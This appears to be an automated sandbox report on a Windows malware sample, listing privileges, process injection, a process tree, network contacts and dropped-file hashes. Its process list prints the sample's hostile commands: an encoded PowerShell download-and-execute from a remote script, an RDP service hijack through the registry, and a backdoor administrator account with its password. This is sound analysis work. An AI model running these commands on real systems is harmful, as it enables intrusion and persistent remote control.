Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3128 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3128 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2916 wrote to memory of 1308 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2916 wrote to memory of 1308 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 1308 wrote to memory of 1312 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 1308 wrote to memory of 1312 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2916 wrote to memory of 3836 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2916 wrote to memory of 3836 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2916 wrote to memory of 3756 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2916 wrote to memory of 3756 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2916 wrote to memory of 1736 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2916 wrote to memory of 1736 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2916 wrote to memory of 2532 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2916 wrote to memory of 2532 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2916 wrote to memory of 2996 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2916 wrote to memory of 2996 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2916 wrote to memory of 3968 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2916 wrote to memory of 3968 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2916 wrote to memory of 2788 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 2916 wrote to memory of 2788 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 2788 wrote to memory of 576 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2788 wrote to memory of 576 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2916 wrote to memory of 196 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2916 wrote to memory of 196 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 196 wrote to memory of 1300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 196 wrote to memory of 1300 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1300 wrote to memory of 3028 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1300 wrote to memory of 3028 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3028 wrote to memory of 2532 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3028 wrote to memory of 2532 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2916 wrote to memory of 2996 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2916 wrote to memory of 2996 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2996 wrote to memory of 3080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2996 wrote to memory of 3080 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3080 wrote to memory of 3832 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3080 wrote to memory of 3832 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3832 wrote to memory of 1844 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3832 wrote to memory of 1844 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3916 wrote to memory of 1188 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3916 wrote to memory of 1188 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1188 wrote to memory of 2260 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1188 wrote to memory of 2260 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2300 wrote to memory of 2516 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2300 wrote to memory of 2516 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2516 wrote to memory of 1300 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2516 wrote to memory of 1300 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2008 wrote to memory of 2264 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2008 wrote to memory of 2264 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2264 wrote to memory of 4076 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2264 wrote to memory of 4076 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2972 wrote to memory of 1420 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2972 wrote to memory of 1420 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1420 wrote to memory of 3292 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1420 wrote to memory of 3292 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2068 wrote to memory of 1520 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2068 wrote to memory of 1520 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1520 wrote to memory of 2172 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1520 wrote to memory of 2172 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3980 wrote to memory of 1300 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3980 wrote to memory of 1300 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1300 wrote to memory of 196 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1300 wrote to memory of 196 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2972 wrote to memory of 3968 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2972 wrote to memory of 3968 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe

Processes

C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe

"C:\Users\Admin\AppData\Local\Temp\472208d7ba18d4c14b7e90b9db5d6feb.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wxut4r0f\wxut4r0f.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9A23.tmp" "c:\Users\Admin\AppData\Local\Temp\wxut4r0f\CSC249ECC34788B4231A934D2558BAC15C4.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc N9Xm3ZCO /add

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc N9Xm3ZCO /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc N9Xm3ZCO /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc N9Xm3ZCO

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc N9Xm3ZCO

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc N9Xm3ZCO

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

C:\Windows\System32\cmd.exe

cmd.exe /C net user wgautilacc 111213&net user wgautilacc /active:yes

C:\Windows\system32\net.exe

net user wgautilacc 111213

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc 111213

C:\Windows\system32\net.exe

net user wgautilacc /active:yes

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc /active:yes

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 2no.co udp
N/A 88.99.66.31:443 2no.co tcp
N/A 8.8.8.8:53 raw.githubusercontent.com udp
N/A 185.199.108.133:443 raw.githubusercontent.com tcp
N/A 8.8.8.8:53 www.speedtest.net udp
N/A 151.101.2.219:80 www.speedtest.net tcp
N/A 151.101.2.219:443 www.speedtest.net tcp
N/A 151.101.2.219:80 www.speedtest.net tcp
N/A 8.8.8.8:53 c.speedtest.net udp
N/A 151.101.2.219:443 c.speedtest.net tcp
N/A 8.8.8.8:53 speedtest.edpnet.net udp
N/A 212.71.0.110:8080 speedtest.edpnet.net tcp
N/A 8.8.8.8:53 speedtest.totaalhost.com udp
N/A 77.169.127.181:8080 speedtest.totaalhost.com tcp
N/A 8.8.8.8:53 st.mr-joep.nl udp
N/A 77.170.178.37:8080 st.mr-joep.nl tcp
N/A 8.8.8.8:53 speedtest1.mirror.nucleus.be udp
N/A 31.193.177.85:8080 speedtest1.mirror.nucleus.be tcp
N/A 8.8.8.8:53 hitnaiguat.xyz udp
N/A 8.8.8.8:53 whereihjeu3.xyz udp
N/A 8.8.8.8:53 sagiai3agar.cn udp
N/A 5.181.156.4:443 sagiai3agar.cn tcp
N/A 8.8.8.8:53 sagiai3agar.cn udp
N/A 5.181.156.4:443 sagiai3agar.cn tcp
N/A 8.8.8.8:53 sagiai3agar.cn udp
N/A 5.181.156.4:443 sagiai3agar.cn tcp
N/A 8.8.8.8:53 sagiai3agar.cn udp
N/A 5.181.156.4:443 sagiai3agar.cn tcp
N/A 8.8.8.8:53 sagiai3agar.cn udp
N/A 5.181.156.4:443 sagiai3agar.cn tcp
N/A 8.8.8.8:53 sagiai3agar.cn udp
N/A 5.181.156.4:443 sagiai3agar.cn tcp
N/A 8.8.8.8:53 sagiai3agar.cn udp
N/A 5.181.156.4:443 sagiai3agar.cn tcp
N/A 8.8.8.8:53 sagiai3agar.cn udp
N/A 5.181.156.4:443 sagiai3agar.cn tcp

Files

memory/3128-114-0x00000126E93E0000-0x00000126E9800000-memory.dmp

memory/3128-115-0x00000126E87D0000-0x00000126E87D2000-memory.dmp

memory/3128-118-0x00000126E87D5000-0x00000126E87D6000-memory.dmp

memory/3128-117-0x00000126E87D3000-0x00000126E87D5000-memory.dmp

memory/3128-119-0x00000126E87D6000-0x00000126E87D7000-memory.dmp

memory/2916-120-0x0000000000000000-mapping.dmp

memory/2916-125-0x000001E5C7E70000-0x000001E5C7E72000-memory.dmp

memory/2916-126-0x000001E5C7E73000-0x000001E5C7E75000-memory.dmp

memory/2916-127-0x000001E5C7E10000-0x000001E5C7E11000-memory.dmp

memory/2916-130-0x000001E5C8000000-0x000001E5C8001000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 3447df88de7128bdc34942334b2fab98
SHA1 519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA256 9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA512 2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

memory/2916-136-0x000001E5C7E76000-0x000001E5C7E78000-memory.dmp

memory/1308-137-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\wxut4r0f\wxut4r0f.cmdline

MD5 4c3eddd88e27613137f9fc37e4b264ca
SHA1 0d4557f4dd9afb549c244a21072ad3296113df53
SHA256 37ca03b68da12b308b0d1562baabc3503db1e7cd03727a25ebe24db24b9744ab
SHA512 f4bf682a65d4b2a94d8b1fff380df3fa792597c4b344c5cf0800af6a428583f81fe4cdb6114f9d40b7881a0e6754c2a3e8a6d7cb49a230ec7791ae4c3fc5b182

\??\c:\Users\Admin\AppData\Local\Temp\wxut4r0f\wxut4r0f.0.cs

MD5 4864fc038c0b4d61f508d402317c6e9a
SHA1 72171db3eea76ecff3f7f173b0de0d277b0fede7
SHA256 0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA512 9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

memory/1312-140-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\wxut4r0f\CSC249ECC34788B4231A934D2558BAC15C4.TMP

MD5 1f40172eba3b5579f8cc7eccc557eac1
SHA1 4a04161e88a51b9029f497cca84033aa84609f49
SHA256 871d297b3961f15056068cffbf3d2cf85465a6cc8e4cf7adbcee9ba8c1ec2dcf
SHA512 bbf73144805d73ee468a053bb4f5e2c94b71a705e2616960eb77a0cf29e02209c7551911de84e4eaba17165ac85ddb25f0847013654352c8f88e4a5593d19373

C:\Users\Admin\AppData\Local\Temp\RES9A23.tmp

MD5 5fd98d205c7de7af5ed82341da8cb621
SHA1 ce18c2a3e25829ef7017c48b0193f9ed96304293
SHA256 17061c224774fed1282505677200c13016a01711c9d66b01a83fb62483a52e87
SHA512 ab3773366a74731820ccd77c32bdc744a996b2b4925dca95b7873282c9e68815bded221338d81d1b01502f3a6fd501a532bbf23cb3b50d090167181383827449

C:\Users\Admin\AppData\Local\Temp\wxut4r0f\wxut4r0f.dll

MD5 e8498786994f6fa8fc41e56a5fcd9548
SHA1 07b3bac8b1d638715716f2e9e259cf0bbbb870ce
SHA256 8f45375b297c8f997c761a05559811d0f2ed9721a1c7bc98aa56270ff9c7789b
SHA512 9186c5438da7a190f06437fe8e37ef1a15300871f8996242385fae8317f498ba355c91a94f487dda836895f99eac8c83cad03d23a8383f7e65edaa91db31766f

memory/2916-144-0x000001E5C7F80000-0x000001E5C7F81000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

MD5 00fb904b2dd958760943b89400e9b7f9
SHA1 8c825862b6f70cbaef991525f31100f713e61e7d
SHA256 392e751cec2e13cbbea5161ae4044532961f8e9013cebaa120ac7553388c919a
SHA512 ee4c598b268768f2a2063064ff2a771042bfa5b41e4c5029cb297a17c265a93ab749a3ffecfe28d9e5084068d77e487d14291e780a3d6da1e0fcfbc26b6bc28a

memory/2916-150-0x000001E5C8560000-0x000001E5C8561000-memory.dmp

memory/2916-151-0x000001E5C7E78000-0x000001E5C7E79000-memory.dmp

memory/2916-152-0x000001E5C88F0000-0x000001E5C88F1000-memory.dmp

memory/3836-159-0x0000000000000000-mapping.dmp

memory/3836-168-0x000001E1FE910000-0x000001E1FE912000-memory.dmp

memory/3836-169-0x000001E1FE913000-0x000001E1FE915000-memory.dmp

memory/3836-172-0x000001E1FE916000-0x000001E1FE918000-memory.dmp

memory/3756-201-0x0000000000000000-mapping.dmp

memory/3836-208-0x000001E1FE918000-0x000001E1FE91A000-memory.dmp

memory/3756-209-0x000001E6BBF70000-0x000001E6BBF72000-memory.dmp

memory/3756-210-0x000001E6BBF73000-0x000001E6BBF75000-memory.dmp

memory/3756-235-0x000001E6BBF76000-0x000001E6BBF78000-memory.dmp

memory/1736-240-0x0000000000000000-mapping.dmp

memory/3756-271-0x000001E6BBF78000-0x000001E6BBF7A000-memory.dmp

memory/1736-272-0x000002779E380000-0x000002779E382000-memory.dmp

memory/1736-276-0x000002779E386000-0x000002779E388000-memory.dmp

memory/1736-273-0x000002779E383000-0x000002779E385000-memory.dmp

memory/1736-291-0x000002779E388000-0x000002779E38A000-memory.dmp

memory/2532-301-0x0000000000000000-mapping.dmp

memory/2996-302-0x0000000000000000-mapping.dmp

memory/3968-303-0x0000000000000000-mapping.dmp

memory/2788-340-0x0000000000000000-mapping.dmp

memory/576-341-0x0000000000000000-mapping.dmp

memory/196-344-0x0000000000000000-mapping.dmp

memory/1300-345-0x0000000000000000-mapping.dmp

memory/3028-346-0x0000000000000000-mapping.dmp

memory/2532-347-0x0000000000000000-mapping.dmp

memory/2996-348-0x0000000000000000-mapping.dmp

memory/3080-349-0x0000000000000000-mapping.dmp

memory/3832-350-0x0000000000000000-mapping.dmp

memory/1844-351-0x0000000000000000-mapping.dmp

\Windows\Branding\mediasrv.png

MD5 b110f38845e18a04ab59a7d8a134ef40
SHA1 8119030034e6fbe62d875e824b5233c1f29d61a0
SHA256 1cbd533a8cf6875e9b9bc60b11711b591bd30aac6377a11ee90c2735182414ea
